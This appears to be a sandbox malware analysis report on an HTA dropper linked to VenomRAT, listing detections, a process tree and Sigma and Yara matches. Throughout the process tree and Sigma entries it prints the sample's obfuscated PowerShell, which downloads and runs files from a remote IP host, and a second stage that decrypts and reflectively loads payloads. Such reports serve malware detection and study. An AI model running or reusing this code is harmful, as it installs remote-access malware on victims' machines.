Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hta.hta

Overview

General Information

Sample name:hta.hta
Analysis ID:1429074
MD5:dbc5a204c56d2c6c974bb9ce287978d4
SHA1:dca280ec6fcc06611132200b78bf9e7bd66504ef
SHA256:d8a8f1d0c357bdecb7bb471e1809231088ed6d4489355da038807aa1a73e964e
Tags:htavenomrat
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Very long command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Suspicious Office Outbound Connections
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 7240 cmdline: mshta.exe "C:\Users\user\Desktop\hta.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • powershell.exe (PID: 7332 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRft);return $hQvuJry};function ySHQDZBWwySzRGIG($xGZDVkPMYLYy){$yFBtdzpE=61228;$oUSwLv=$Null;foreach($fxEGQMN in $xGZDVkPMYLYy){$oUSwLv+=[char]($fxEGQMN-$yFBtdzpE)};return $oUSwLv};function dDSCNJIjjRgIM(){$lBhpKXrqsdodra = $env:AppData + '\';$RtGcEcBBqYud = $lBhpKXrqsdodra + 'jiteon.xlsx';If(Test-Path -Path $RtGcEcBBqYud){Invoke-Item $RtGcEcBBqYud;}Else{ $hKUnbCqsPbBsWBpNkbF = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyfTBcnYzprd $RtGcEcBBqYud $hKUnbCqsPbBsWBpNkbF;Invoke-Item $RtGcEcBBqYud;};$gzgwwTbWpZOp = $lBhpKXrqsdodra + 'GoGi.bat'; if (Test-Path -Path $gzgwwTbWpZOp){RsNIEjCO $gzgwwTbWpZOp;}Else{ $VgJdQKaf = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyfTBcnYzprd $gzgwwTbWpZOp $VgJdQKaf;RsNIEjCO $gzgwwTbWpZOp;};;;;}dDSCNJIjjRgIM; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • EXCEL.EXE (PID: 7500 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\AppData\Roaming\jiteon.xlsx" MD5: 4A871771235598812032C822E6F68F19)
        • splwow64.exe (PID: 7896 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
      • cmd.exe (PID: 7536 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\GoGi.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 7580 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\GoGi.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7628 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\GoGi.bat';$gPQY='CmYpnhamYpnnmYpngmYpnemYpnEmYpnxtmYpnenmYpnsmYpniomYpnnmYpn'.Replace('mYpn', ''),'LoaUtEPdUtEP'.Replace('UtEP', ''),'MaiCYgQnMCYgQodCYgQuleCYgQ'.Replace('CYgQ', ''),'SprHTnlitrHTn'.Replace('rHTn', ''),'TrrzhRarzhRnsfrzhRorrzhRmFrzhRirzhRnarzhRlBlrzhRorzhRckrzhR'.Replace('rzhR', ''),'GetuUbXCuUbXuuUbXruUbXreuUbXntuUbXPuUbXrouUbXcuUbXesuUbXsuUbX'.Replace('uUbX', ''),'FrFEdOomBFEdOasFEdOe64FEdOStrFEdOiFEdOngFEdO'.Replace('FEdO', ''),'ReanclddLncldinencldsncld'.Replace('ncld', ''),'DjPqYejPqYcojPqYmpjPqYrejPqYssjPqY'.Replace('jPqY', ''),'IPIJhnvPIJhokPIJhePIJh'.Replace('PIJh', ''),'CopZKPiyTZKPioZKPi'.Replace('ZKPi', ''),'ElIXGDeIXGDmIXGDenIXGDtAIXGDtIXGD'.Replace('IXGD', ''),'CruXrmeuXrmatuXrmeDeuXrmcryuXrmptuXrmoruXrm'.Replace('uXrm', ''),'EJuQRntJuQRrJuQRyPJuQRoinJuQRtJuQR'.Replace('JuQR', '');powershell -w hidden;function oukWk($hMAdX){$uBEEb=[System.Security.Cryptography.Aes]::Create();$uBEEb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$uBEEb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$uBEEb.Key=[System.Convert]::($gPQY[6])('TGdOerQan8DiYOIpc1W3E6Uf7wMJSi91JjPhdKuCB3Q=');$uBEEb.IV=[System.Convert]::($gPQY[6])('CruLH9j6aex2cpz0fozZ+w==');$XBRRE=$uBEEb.($gPQY[12])();$gomww=$XBRRE.($gPQY[4])($hMAdX,0,$hMAdX.Length);$XBRRE.Dispose();$uBEEb.Dispose();$gomww;}function SIliJ($hMAdX){$nQeHe=New-Object System.IO.MemoryStream(,$hMAdX);$EvPMN=New-Object System.IO.MemoryStream;$uxdRy=New-Object System.IO.Compression.GZipStream($nQeHe,[IO.Compression.CompressionMode]::($gPQY[8]));$uxdRy.($gPQY[10])($EvPMN);$uxdRy.Dispose();$nQeHe.Dispose();$EvPMN.Dispose();$EvPMN.ToArray();}$WrkBk=[System.IO.File]::($gPQY[7])([Console]::Title);$dItwN=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 5).Substring(2))));$Yylgf=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 6).Substring(2))));[System.Reflection.Assembly]::($gPQY[1])([byte[]]$Yylgf).($gPQY[13]).($gPQY[9])($null,$null);[System.Reflection.Assembly]::($gPQY[1])([byte[]]$dItwN).($gPQY[13]).($gPQY[9])($null,$null); " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • powershell.exe (PID: 7636 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • powershell.exe (PID: 7828 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • svchost.exe (PID: 7916 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7332INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x418d0:$b1: ::WriteAllBytes(
  • 0x439a2:$b1: ::WriteAllBytes(
  • 0x4430f:$b1: ::WriteAllBytes(
  • 0x44a96:$b1: ::WriteAllBytes(
  • 0x77925:$b1: ::WriteAllBytes(
  • 0x989ee:$b1: ::WriteAllBytes(
  • 0x99319:$b1: ::WriteAllBytes(
  • 0x99d88:$b1: ::WriteAllBytes(
  • 0x9a770:$b1: ::WriteAllBytes(
  • 0x1a0e39:$b1: ::WriteAllBytes(
  • 0x1a15c0:$b1: ::WriteAllBytes(
  • 0x1a69ca:$b1: ::WriteAllBytes(
  • 0x1a7151:$b1: ::WriteAllBytes(
  • 0x1c03f0:$b1: ::WriteAllBytes(
  • 0x1c97f2:$b1: ::WriteAllBytes(
  • 0x2146cc:$b1: ::WriteAllBytes(
  • 0x214e53:$b1: ::WriteAllBytes(
  • 0x21578f:$b1: ::WriteAllBytes(
  • 0x2167c6:$b1: ::WriteAllBytes(
  • 0xa8767:$s1: -join
  • 0xaada0:$s1: -join

Sigma Signatures

System Summary

barindex
Sigma detected: Potential PowerShell Command Line Obfuscation
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRft);return $hQvuJry};function ySHQDZBWwySzRGIG($xGZDVkPMYLYy){$yFBtdzpE=61228;$oUSwLv=$Null;foreach($fxEGQMN in $xGZDVkPMYLYy){$oUSwLv+=[char]($fxEGQMN-$yFBtdzpE)};return $oUSwLv};function dDSCNJIjjRgIM(){$lBhpKXrqsdodra = $env:AppData + '\';$RtGcEcBBqYud = $lBhpKXrqsdodra + 'jiteon.xlsx';If(Test-Path -Path $RtGcEcBBqYud){Invoke-Item $RtGcEcBBqYud;}Else{ $hKUnbCqsPbBsWBpNkbF = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyfTBcnYzprd $RtGcEcBBqYud $hKUnbCqsPbBsWBpNkbF;Invoke-Item $RtGcEcBBqYud;};$gzgwwTbWpZOp = $lBhpKXrqsdodra + 'GoGi.bat'; if (Test-Path -Path $gzgwwTbWpZOp){RsNIEjCO $gzgwwTbWpZOp;}Else{ $VgJdQKaf = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyfTBcnYzprd $gzgwwTbWpZOp $VgJdQKaf;RsNIEjCO $gzgwwTbWpZOp;};;;;}dDSCNJIjjRgIM;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRf
Sigma detected: Powerup Write Hijack DLL
Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7332, TargetFilename: C:\Users\user\AppData\Roaming\GoGi.bat
Sigma detected: Suspicious MSHTA Child Process
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRft);return $hQvuJry};function ySHQDZBWwySzRGIG($xGZDVkPMYLYy){$yFBtdzpE=61228;$oUSwLv=$Null;foreach($fxEGQMN in $xGZDVkPMYLYy){$oUSwLv+=[char]($fxEGQMN-$yFBtdzpE)};return $oUSwLv};function dDSCNJIjjRgIM(){$lBhpKXrqsdodra = $env:AppData + '\';$RtGcEcBBqYud = $lBhpKXrqsdodra + 'jiteon.xlsx';If(Test-Path -Path $RtGcEcBBqYud){Invoke-Item $RtGcEcBBqYud;}Else{ $hKUnbCqsPbBsWBpNkbF = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyfTBcnYzprd $RtGcEcBBqYud $hKUnbCqsPbBsWBpNkbF;Invoke-Item $RtGcEcBBqYud;};$gzgwwTbWpZOp = $lBhpKXrqsdodra + 'GoGi.bat'; if (Test-Path -Path $gzgwwTbWpZOp){RsNIEjCO $gzgwwTbWpZOp;}Else{ $VgJdQKaf = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyfTBcnYzprd $gzgwwTbWpZOp $VgJdQKaf;RsNIEjCO $gzgwwTbWpZOp;};;;;}dDSCNJIjjRgIM;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRf
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRft);return $hQvuJry};function ySHQDZBWwySzRGIG($xGZDVkPMYLYy){$yFBtdzpE=61228;$oUSwLv=$Null;foreach($fxEGQMN in $xGZDVkPMYLYy){$oUSwLv+=[char]($fxEGQMN-$yFBtdzpE)};return $oUSwLv};function dDSCNJIjjRgIM(){$lBhpKXrqsdodra = $env:AppData + '\';$RtGcEcBBqYud = $lBhpKXrqsdodra + 'jiteon.xlsx';If(Test-Path -Path $RtGcEcBBqYud){Invoke-Item $RtGcEcBBqYud;}Else{ $hKUnbCqsPbBsWBpNkbF = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyfTBcnYzprd $RtGcEcBBqYud $hKUnbCqsPbBsWBpNkbF;Invoke-Item $RtGcEcBBqYud;};$gzgwwTbWpZOp = $lBhpKXrqsdodra + 'GoGi.bat'; if (Test-Path -Path $gzgwwTbWpZOp){RsNIEjCO $gzgwwTbWpZOp;}Else{ $VgJdQKaf = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyfTBcnYzprd $gzgwwTbWpZOp $VgJdQKaf;RsNIEjCO $gzgwwTbWpZOp;};;;;}dDSCNJIjjRgIM;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRf
Sigma detected: Excel Network Connections
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 13.107.246.41, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7500, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49755
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7332, TargetFilename: C:\Users\user\AppData\Roaming\GoGi.bat
Sigma detected: Potential Dosfuscation Activity
Source: Process startedAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRft);return $hQvuJry};function ySHQDZBWwySzRGIG($xGZDVkPMYLYy){$yFBtdzpE=61228;$oUSwLv=$Null;foreach($fxEGQMN in $xGZDVkPMYLYy){$oUSwLv+=[char]($fxEGQMN-$yFBtdzpE)};return $oUSwLv};function dDSCNJIjjRgIM(){$lBhpKXrqsdodra = $env:AppData + '\';$RtGcEcBBqYud = $lBhpKXrqsdodra + 'jiteon.xlsx';If(Test-Path -Path $RtGcEcBBqYud){Invoke-Item $RtGcEcBBqYud;}Else{ $hKUnbCqsPbBsWBpNkbF = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61334,61333,61344,61329,61339,61338,61274,61348,61336,61343,61348));zyfTBcnYzprd $RtGcEcBBqYud $hKUnbCqsPbBsWBpNkbF;Invoke-Item $RtGcEcBBqYud;};$gzgwwTbWpZOp = $lBhpKXrqsdodra + 'GoGi.bat'; if (Test-Path -Path $gzgwwTbWpZOp){RsNIEjCO $gzgwwTbWpZOp;}Else{ $VgJdQKaf = ZWufiDkKJd (ySHQDZBWwySzRGIG @(61332,61344,61344,61340,61286,61275,61275,61277,61285,61279,61274,61278,61278,61278,61274,61285,61282,61274,61277,61277,61280,61286,61283,61278,61284,61283,61275,61299,61339,61299,61333,61274,61326,61325,61344));zyfTBcnYzprd $gzgwwTbWpZOp $VgJdQKaf;RsNIEjCO $gzgwwTbWpZOp;};;;;}dDSCNJIjjRgIM;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRf
Sigma detected: Suspicious Office Outbound Connections
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.4, DestinationIsIpv6: false, DestinationPort: 49755, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 7500, Protocol: tcp, SourceIp: 13.107.246.41, SourceIsIpv6: false, SourcePort: 443
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function zyfTBcnYzprd($pHHdIofq, $hQvuJry){[IO.File]::WriteAllBytes($pHHdIofq, $hQvuJry)};function RsNIEjCO($pHHdIofq){if($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61328,61336,61336))) -eq $True){rundll32.exe $pHHdIofq }elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61340,61343,61277))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $pHHdIofq}elseif($pHHdIofq.EndsWith((ySHQDZBWwySzRGIG @(61274,61337,61343,61333))) -eq $True){misexec /qn /i $pHHdIofq}else{Start-Process $pHHdIofq}};function ZWufiDkKJd($WfmgmuntIKBYcRft){$ywqrhKjGiioXguh = New-Object (ySHQDZBWwySzRGIG @(61306,61329,61344,61274,61315,61329,61326,61295,61336,61333,61329,61338,61344));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$hQvuJry = $ywqrhKjGiioXguh.DownloadData($WfmgmuntIKBYcRft);return $hQvuJry};function ySHQDZBWwySzRGIG($xGZDVkPMYLYy){$yFBtdzpE=61228;$oUSwLv=$Null;foreach($fxEGQMN in $xGZDVkPMYLYy){$oUSwLv+=[char]($fxEGQMN-$yFBtdzpE)};return $oUSwLv};function dDSCNJIjjRgIM(){$lBhpKXrqsdodra = $env:AppData 